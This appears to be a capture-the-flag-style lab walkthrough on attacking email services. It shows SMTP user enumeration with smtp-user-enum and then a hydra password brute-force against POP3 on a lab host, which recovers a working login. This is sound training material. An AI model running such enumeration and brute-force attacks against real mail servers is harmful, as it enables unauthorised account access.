Attacking Email Services

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ smtp-user-enum -M RCPT -U users.list -t 10.129.203.12 -D inlanefreight.htb
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.list
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Thu Mar 20 17:51:04 2025 #########
10.129.203.12: marlin@inlanefreight.htb exists
######## Scan completed at Thu Mar 20 17:51:07 2025 #########
1 results.

79 queries in 3 seconds (26.3 queries / sec)

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]

┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hydra -l "marlin@inlanefreight.htb" -P passwords.list -f inlanefreight.htb pop3
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 17:56:25
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 250 login tries (l:1/p:250), ~16 tries per task
[DATA] attacking pop3://inlanefreight.htb:110/
[110][pop3] host: inlanefreight.htb   login: marlin@inlanefreight.htb   password: poohbear
[STATUS] attack finished for inlanefreight.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 17:56:28